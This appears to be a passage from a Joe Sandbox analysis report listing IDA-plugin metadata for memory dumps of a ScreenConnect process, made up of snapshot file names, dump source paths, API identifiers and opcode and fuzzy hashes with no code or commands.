                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9b880000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                                                                  • Opcode ID: b299d35fc94ded8f1d337901cab6e28274d576d7fc35b51867b341c4a099c607
                                                                                                                                                                                                                                                  • Instruction ID: cf13b99d0012973a44c012937122966b84475dbc9437e08e0d9a743afed9e139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b299d35fc94ded8f1d337901cab6e28274d576d7fc35b51867b341c4a099c607
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68413931D0DB484FDB29AFA89C4A5E97BE0EF59310F04017FE499C3192DF78A9468B91

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: aa47a16e721debbb73406acc4f8205c6e493daead7be565bc94e4e17827a1abe
                                                                                                                                                                                                                                                  • Instruction ID: 9edbd51e18dec768b43da55f785737ece9d1791b4b47ebd1c3d1e5b52e687661
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa47a16e721debbb73406acc4f8205c6e493daead7be565bc94e4e17827a1abe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7717531F1AD1F4BEB7997A4C4706B962D2FF9838CF564039D41FC32E6DE296A418240

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                  • API String ID: 0-3372436214
                                                                                                                                                                                                                                                  • Opcode ID: 939625d6a65bd000342baf51e3bb5167f5abd5652c938a1810598693c50b1af2
                                                                                                                                                                                                                                                  • Instruction ID: cb9f02cf5cd8ee10499b237ad47cea54a8cdeffc02c280f5c1dff57f6023030b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 939625d6a65bd000342baf51e3bb5167f5abd5652c938a1810598693c50b1af2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC514732B0EE4D4FEB649BA8EC615E977E1FF94348F05017AE45CC31E2EE25A9068740

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: W
                                                                                                                                                                                                                                                  • API String ID: 0-655174618
                                                                                                                                                                                                                                                  • Opcode ID: d478bf0c578ad9aa3e974f5cec000bafda5080cff696be988523eb235f8b5902
                                                                                                                                                                                                                                                  • Instruction ID: 90f3354c394169313fedb229aaaba304362d607ea7163f39574e64d8e19fee5a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d478bf0c578ad9aa3e974f5cec000bafda5080cff696be988523eb235f8b5902
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B21793160EA894FD769AB34DC605A5BBF1FF89318B0502BAD44DC31E3DB28A802C341
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 740d378188e6cf91fe7781bb0d7d60200f251439b7f1dd0040e8a98fc2d701fa
                                                                                                                                                                                                                                                  • Instruction ID: cf1052707fa2fc87584c81eb8339ccdb3fcf649686472f9540637125266db965
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740d378188e6cf91fe7781bb0d7d60200f251439b7f1dd0040e8a98fc2d701fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF022671B0EA4E4FE7A9E6ACD4A56B437D1FF98348F4500BAE44DC72E3DD24A9468340
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f9a3388b9df4eb0c55bbb1c8821ab597b690bb9a142b14a587c247b3358cb984
                                                                                                                                                                                                                                                  • Instruction ID: b371a89ab2d4547369b93455579be3d8568154be4f03b945ff46852e94d932f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a3388b9df4eb0c55bbb1c8821ab597b690bb9a142b14a587c247b3358cb984
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FC13932A0EA4E0BEB79DA58C8628B57391FF9475CB05017DD45E871D3EE24FA0AC781
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0787f8f3dacf96fcb06a83cdcd234b3b28cb29264fb7f58c628de23d7179e68c
                                                                                                                                                                                                                                                  • Instruction ID: ce32b10dacbe61c81942d45a207ab25c87c20e8f083c0fc231650dfc5866fce6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0787f8f3dacf96fcb06a83cdcd234b3b28cb29264fb7f58c628de23d7179e68c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2812871B1EA4E4BEBA8AA68C4A16A43381FF6438CF1541BDD45EC71E7ED24F9468340
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 729c90cea1fcba91b7a48fe919b45f7c8b5f60624dfcba25a19b9374944077e7
                                                                                                                                                                                                                                                  • Instruction ID: 2c0e0781497959d74490eb0690b4cf1949d09e07e1bc822a3a2566d60aa07cee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 729c90cea1fcba91b7a48fe919b45f7c8b5f60624dfcba25a19b9374944077e7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7061123470DA098FDBDCEF58C4A0AA177E2FF99308B2505A8D059CF69ACA25ED43C750
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c99c3b60d49241690f3164f76bb5bc8fe1ea926851f66adb3b2ce246287c4d9e
                                                                                                                                                                                                                                                  • Instruction ID: 34690c57fcb445322b95934031e6ddb19749b9b3f868324529ed7978a5a4df4c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c99c3b60d49241690f3164f76bb5bc8fe1ea926851f66adb3b2ce246287c4d9e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951A472B0DA494FDB9CDE68C461A6537D2FFA4318B0501B9D45DCB2E7DA25F802C740
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f2d7800a76a35251b79fbcfd26d64116bbde04c0630b679207dc158b51ebf802
                                                                                                                                                                                                                                                  • Instruction ID: 4b7d6dcb66a1b000e5d63a72b3374858a86fb4c5c95a20ab6075d341bb70b6c7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d7800a76a35251b79fbcfd26d64116bbde04c0630b679207dc158b51ebf802
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52417371609B4D8FDB98DF18C8B4A6937A1FF58318B1505ADE45EC72E2DA35E852CB00
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5784d7bc4233b9fa7e982b1d075b1d9ba26a0ddbf2ddfaa7bb60890db16c4240
                                                                                                                                                                                                                                                  • Instruction ID: 3d04dba590f3e5222ae7e19b5fc70b4cbdd73e6b663ebb29e6bc9a2ee4e30a03
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5784d7bc4233b9fa7e982b1d075b1d9ba26a0ddbf2ddfaa7bb60890db16c4240
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86316E21A0EBCD4FE767976448355A47FB1AF57204B4A01EBD089CB1F3D9196D098352
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 55ea220e618222e5ac6c65f89a466cea5308014656c94dc4247c08bc5c351fc3
                                                                                                                                                                                                                                                  • Instruction ID: 93ea1c3c7cf005113c20f6afc10cc7afa3313ac36c2fa6de3bb7ebfdd370dc70
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55ea220e618222e5ac6c65f89a466cea5308014656c94dc4247c08bc5c351fc3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1431D533F0EA4C4BDBA596A8DC311E83BA1FF45398F0601A7E54CD32E2EA1999048381
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7cedb06846e4d4935dfa3ff629b0f9ed55d83cf3f3d03cab34e225c22de87852
                                                                                                                                                                                                                                                  • Instruction ID: d522a364be7699a003063d8981a9bb21e62115fc9615c046a6ac021aabeedec5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7cedb06846e4d4935dfa3ff629b0f9ed55d83cf3f3d03cab34e225c22de87852
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C11B472F0EB4C5BDFA4DFA498B10A83FA1FF55308F0605AAE05DC32A2DA71A5018701
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 39d51af66970868c6169ab9aa3f452f0563a8323fb369b2963f220539bbac4ce
                                                                                                                                                                                                                                                  • Instruction ID: 7b6c246372ea0cf2c58657709ea1d4b482f2c3c5657889c7a2e4331679079632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39d51af66970868c6169ab9aa3f452f0563a8323fb369b2963f220539bbac4ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9110614F0EA5B0BF7799368847037427E1EF85348F0A81BEC449C32E6DC2CAD818311
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 101b8fcfdd9570a990d0b02a62674574afb53cb0fd39fff78244531bfb6a64de
                                                                                                                                                                                                                                                  • Instruction ID: 820b0478a179062288bd2638718c9d2c96a6d4fb2ba417e6d9d986bc771d5044
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 101b8fcfdd9570a990d0b02a62674574afb53cb0fd39fff78244531bfb6a64de
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D119371B099494FDB9CEF98C460B657791FF68308B0541B8C45DCB2D7DE25E905C780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4d444fc40d27c066f1ec5d8b6454c879de1dfa6de66103203a28a47f2fafd566
                                                                                                                                                                                                                                                  • Instruction ID: 55faf914fa24a24484ec71267dec130accca0ce5b84570cd158c7c77690e22fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d444fc40d27c066f1ec5d8b6454c879de1dfa6de66103203a28a47f2fafd566
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77116071B199494FDB9CEF58C460B657792FF68308B0541B8C45DCB2D7DE25E906C780
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 42cad55f13f14b8d1a5ded4631833444dede7a311d9903b5431842258f7989f1
                                                                                                                                                                                                                                                  • Instruction ID: ba3c51ff132d30bcfd7e5244657a0ff4b78a873b4b068f64744b3717ece16480
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42cad55f13f14b8d1a5ded4631833444dede7a311d9903b5431842258f7989f1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF08C2240E2D24FD36697B488A56E47FF0AF47110B0F82FAD0C8CB4A3D50C598A8361
Memory Dump Source
• Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd